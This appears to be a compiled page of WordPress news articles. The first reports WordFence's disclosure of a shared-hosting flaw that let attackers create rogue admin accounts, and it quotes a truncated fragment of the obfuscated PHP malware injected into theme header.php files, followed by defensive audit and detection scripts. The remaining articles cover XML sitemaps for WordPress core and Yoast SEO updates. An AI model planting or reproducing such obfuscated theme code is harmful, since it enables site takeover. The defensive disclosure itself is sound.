
Web Host Vulnerability Discovered at iPage, FatCow, PowWeb, and NetFirm


WordFence announced that they had discovered a vulnerability at four hosting companies. WordFence warns that while the vulnerability was patched, it’s possible sites were hacked prior to the fix.

Server settings allowed hackers to create WordPress administrator accounts from which the sites could be exploited with rogue code added to the WordPress theme.

WordFence urged site administrators to check their sites for rogue administrator accounts if they are hosted on iPage, FatCow, PowWeb, or NetFirm. All four are owned by the same company, Endurance International Group.

What Was the Server Vulnerability?

The affected servers had permission and file settings that allowed an attacker to view sensitive files. Other vulnerabilities allowed the attackers to access the database, add themselves as administrators, and then take over the site.

This is how WordFence described the vulnerability:

“Four conditions existed that contributed to this vulnerability:

1. Customer files are all stored on a shared file system.

2. The full path to a user’s web root directory was public or could be guessed.

3. All directories in the path to a customer’s site root directory were either world-traversable (the execute bit for ‘all users’ is 1) or group-traversable (the execute bit for ‘group’ is 1), and the sensitive files were world-readable (the read bit for ‘all users’ is 1) or group-readable (the read bit for ‘group’ is 1).

4. An attacker could cause a program running in the group www to read files in arbitrary locations.”
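Condition 3 can be checked on a site you control. The following is an added example, not code from WordFence or the hosting companies: it reports whether a sensitive file such as wp-config.php is reachable through group or world permission bits along its whole path. The function names, the `base` parameter and the temporary directory tree are assumptions made for the demonstration, and ACLs are not considered.

```python
import os
import stat
import tempfile

def chain_dirs(file_path, base):
    """Directories from base down to the file's parent, inclusive."""
    base = os.path.abspath(base)
    d = os.path.dirname(os.path.abspath(file_path))
    dirs = [d]
    while d != base and os.path.dirname(d) != d:
        d = os.path.dirname(d)
        dirs.append(d)
    return dirs[::-1]

def audit(file_path, base="/"):
    """Return (exposed, reason) for one sensitive file under condition 3."""
    for d in chain_dirs(file_path, base):
        mode = os.stat(d).st_mode
        # One directory without group/world execute breaks the whole path.
        if not mode & (stat.S_IXGRP | stat.S_IXOTH):
            return False, f"traversal blocked at {d} ({stat.filemode(mode)})"
    mode = os.stat(file_path).st_mode
    if mode & stat.S_IROTH:
        return True, "world-readable via a traversable path"
    if mode & stat.S_IRGRP:
        # Only matters to processes in the file's group (condition 4).
        return True, "group-readable via a traversable path"
    return False, "file is not group- or world-readable"

def demo():
    """Constructed tree standing in for a shared-hosting customer directory."""
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "home", "customer1", "public_html")
        os.makedirs(root)
        cfg = os.path.join(root, "wp-config.php")
        open(cfg, "w").close()
        for d in chain_dirs(cfg, base):
            os.chmod(d, 0o750)
        os.chmod(cfg, 0o640)
        as_found = audit(cfg, base)
        os.chmod(cfg, 0o600)                      # fix 1: owner-only file
        file_fixed = audit(cfg, base)
        os.chmod(cfg, 0o640)
        os.chmod(os.path.join(base, "home", "customer1"), 0o700)  # fix 2
        dir_fixed = audit(cfg, base)
        return as_found, file_fixed, dir_fixed

if __name__ == "__main__":
    for result in demo():
        print(result)
```

Either fix alone closes the path: removing group and world read from the file, or removing group and world execute from any one directory above it.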

Sites Could be Infected

WordFence warned that there was a period of time before the vulnerability was fixed during which sites hosted on these four host providers could have been infected.

It is recommended that site owners check their user lists to make sure there are no unauthorized administrators. If your site has been affected, then there should be rogue code that was added to the theme.

Here is how WordFence described the rogue code:

“If your site was exploited before the fixes, the attackers may have added malware which could still be present. Our customers had obfuscated code added at the top of the active theme’s header.php file, similar to this:

<?php ${“x47x4cx4fx42x41x4cx53”}[“ddx70x68zx67x64gx”]=”slx77kx77i”;${“x47x4cOx42x41Lx53”}[“cx7ax66x6dubkdox6ax78″]=”x6cx6fx63x61tx69x6fn”;${“x47x4cx4fBx41LS”}[“x67x64x64ex74x62px75fx65i”]=”x68tx6dx6c”;${“x47x4cOBx41x4cS”}[“x77ix64x68x6bvx6da”]=”x73tx72x66″;${“x47x4cx4fx42x41x4cx53”}[“x66sx75x71x79x6evw”]=”bx6fx74″;${“x47x4cOBALx53”}[“wx6cx79x63x61x76x62x71x68x6fx6cx75″]=”cacx68x65”;${“Gx4cOx42x41Lx53”}[“ryx68x72kux6b”]=”x73x63hx65x6dx65″;${“x47x4cx4fx42x41Lx53”}[“x74x6ax6bcx64ex65x69w”]=”x73lx77kx77ix32″;${“Gx4cOBAx4cS”}[“x79x65x64x73x67x6ahx69x73x67″]=”x73x6cx74lx65x69lx73″;”
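A header.php file can be checked for this pattern automatically. The scanner below is an added example, not WordFence's detection logic: it assumes the `x47x4c…` runs in the sample above are PHP `\xNN` string escapes whose backslashes were lost in the copy shown here (hex 47 4c 4f 42 41 4c 53 spells GLOBALS), and it flags `${"..."}` names near the top of the file that decode to GLOBALS. The `INFECTED` and `CLEAN` inputs are constructed for the demonstration.

```python
import re

# ${"..."} variable-variable whose name is a double-quoted PHP string.
VAR_VAR = re.compile(r'\$\{\s*"((?:[^"\\]|\\.)*)"\s*\}')
# PHP double-quoted strings accept \x followed by one or two hex digits.
HEX_ESC = re.compile(r'\\x([0-9a-fA-F]{1,2})')

def decode_hex_escapes(s):
    """Resolve \\xNN escapes the way PHP would inside double quotes."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)

def scan_theme_header(source, head_lines=10):
    """Return (line_no, raw_name) for each hex-obfuscated $GLOBALS
    reference found in the first head_lines lines of header.php."""
    hits = []
    for no, line in enumerate(source.splitlines()[:head_lines], start=1):
        for m in VAR_VAR.finditer(line):
            raw = m.group(1)
            # Plain ${"GLOBALS"} is unusual but not obfuscated; skip it.
            if raw != "GLOBALS" and decode_hex_escapes(raw) == "GLOBALS":
                hits.append((no, raw))
    return hits

# Constructed sample shaped like the injected line described above.
INFECTED = r'''<?php ${"\x47\x4cO\x42\x41L\x53"}["a\x62c"]="l\x6fc";${"G\x4cOBA\x4cS"}["d\x65f"]="h\x74ml"; ?>
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
'''

# Constructed sample of an ordinary theme header.
CLEAN = '''<?php
/** The header for our theme. */
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
'''

if __name__ == "__main__":
    print(scan_theme_header(INFECTED))
    print(scan_theme_header(CLEAN))
```

A hit is a reason to compare the file against a known-good copy of the theme, not proof on its own; an empty result does not rule out code obfuscated in a different way.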

Vulnerability Has Been Fixed

WordFence disclosed the vulnerability to the hosting companies before making a public announcement. The hosting companies promptly fixed the vulnerabilities.

Nevertheless, according to the guidance offered by WordFence, you may wish to check your user lists for rogue admin level accounts and review your header.php file for rogue code.

Read the entire announcement at the WordFence blog


Yoast, Google devs propose XML Sitemaps for WordPress Core


The inclusion of XML Sitemaps as a WordPress Core feature has been proposed by a group of Yoast and Google team members as well as other contributors. In addition to a basic XML Sitemap, the proposal also introduces an XML Sitemaps API that would extend functionality for developers and webmasters.

The proposed XML Sitemaps structure. Image sourced from Make WordPress Core.

What it’ll include. The proposal states that XML Sitemaps will be enabled by default, allowing for indexing of the following content types:

  • Homepage
  • Posts page
  • Core post types (Pages and Posts)
  • Custom post types
  • Core taxonomies (Tags and Categories)
  • Custom taxonomies
  • Users (Authors)

It’s worth keeping in mind that your WordPress site’s automatically generated robots.txt file will also reference your sitemap index.

What it won’t include. Although the proposed feature will include the majority of WordPress content types and meet search engine minimum requirements, the initial integration will not cover image, video or news sitemaps, XML Sitemaps caching mechanisms or user-facing changes such as UI controls that exclude individual posts or pages from the sitemap.

The XML Sitemaps API. Here’s how the API will let you manipulate your XML Sitemaps:

  • Provide a custom XML Stylesheet
  • Add extra sitemaps and sitemap entries
  • Add extra attributes to sitemap entries
  • Exclude a specific post, post type, taxonomy or term from the sitemap
  • Exclude a specific author from the sitemap
  • Exclude specific authors with a specific role from the sitemap

Why we should care. Sitemaps facilitate indexing by providing web crawlers with your site’s URLs. If implemented, this might mean one less third-party plugin that brands and webmasters have to rely on for their SEO efforts. As a WordPress Core feature, we can expect wider compatibility and support than we might get from third-party solutions.

Poorly optimized plugins can also slow down your site, which can have a negative impact on your organic traffic. This default option from WordPress may not replace plugins like Yoast SEO because they often include other features in addition to XML Sitemaps, but its availability has the potential to provide us with more flexibility over which plugins we install.


About The Author

George Nguyen is an Associate Editor at Third Door Media. His background is in content marketing, journalism, and storytelling.


Yoast SEO 11.4 adds FAQ structured data, UX improvements


Yoast SEO’s latest update enhances its FAQ blocks by automatically generating structured data to accompany questions and answers. The update also introduces some UX improvements and addresses issues with AMP pages when viewed in Reader mode.

How to use it. Yoast’s FAQ structured data implementation is only compatible with the WordPress block editor (also known as Gutenberg; available on versions 5.0 and newer). Webmasters can get started by selecting the FAQ block, adding a question, inputting the answer and an image (if applicable) and repeating the process for all frequently asked questions.

The Yoast FAQ block.

The corresponding FAQpage structured data will be generated in the background and added to Yoast’s structured data graph, which may help search engines identify your FAQ page and figure out how it fits into the overall scheme of your site.

A new action and filter were also introduced to make this integration more flexible. The wpseo_pre-schema_block-type_<block-type> action lets you adjust the graph output based on the blocks on the page, and the wpseo_schema_block_<block-type> filter enables you to filter graph output on a per-block basis.

Other improvements. Yoast has also linked the SEO and readability scores in the Classic Editor and relocated the Focus keyphrase field to the top of the meta box and sidebar to make it easier to find. They have also resolved issues with AMP pages when viewed in Reader mode.

Why we should care. At this year’s I/O conference, Google announced support for FAQ markup, which may mean that searchers will be presented with FAQs as rich results more frequently. Being able to easily and efficiently equip our FAQ sections with structured data can yield better odds of earning prominent placement on SERPs.

For more on Yoast’s structured data implementation, check out our coverage on their 11.0 (general schema implementation), 11.1 (image and video), 11.2 (custom schema) and 11.3 (image and avatar) updates.


About The Author

George Nguyen is an Associate Editor at Third Door Media. His background is in content marketing, journalism, and storytelling.


Yoast SEO 11.3 lets you add an image of a person to its structured data graph


Yoast’s latest plugin update lets webmasters include an image, avatar or logo in its structured data graph and adds a new filter that can be used to disable link indexation. It also announced that it will be pulling support for versions of WordPress below 5.2 as soon as 5.3 is released.

An image, photo or logo can be associated with the person the site represents.

Why we should care. Like it or not, rich results are showing up in SERPs more and more. Using structured data markup can help search engines understand your content and display it as a rich result. In this particular case, applying it to the image of a person that a website represents may help surface that image on relevant queries and increase traffic.

Yoast typically only supports the two most recent WordPress versions, but they’ve kept supporting WordPress 4.9 to give webmasters more time to switch over to 5.0’s new editor. When 5.3 is released, sites that aren’t at least on WordPress 5.2 may not get the full benefits of Yoast’s schema implementation.

More on the update. Along with some bug fixes, Yoast also included a new wpseo_should_index_links filter that webmasters can use if they want to disable link indexation and added support for built-in taxonomies for those that would like to include their blog archive page in the breadcrumbs.

Beginning with Yoast SEO 11.0, the plugin creator has focused on revamping schema implementation to make it more accessible. Its previous updates have been focused on helping users provide the correct information for Google Knowledge Panels, Pinterest Rich Pins, applying Schema to images and videos as well as customizing what structured data gets shown to search engines. It has been releasing updates just about every other week, so we may see another one around mid-June.


About The Author

George Nguyen is an Associate Editor at Third Door Media. His background is in content marketing, journalism, and storytelling.




Copyright © 2019 Plolu.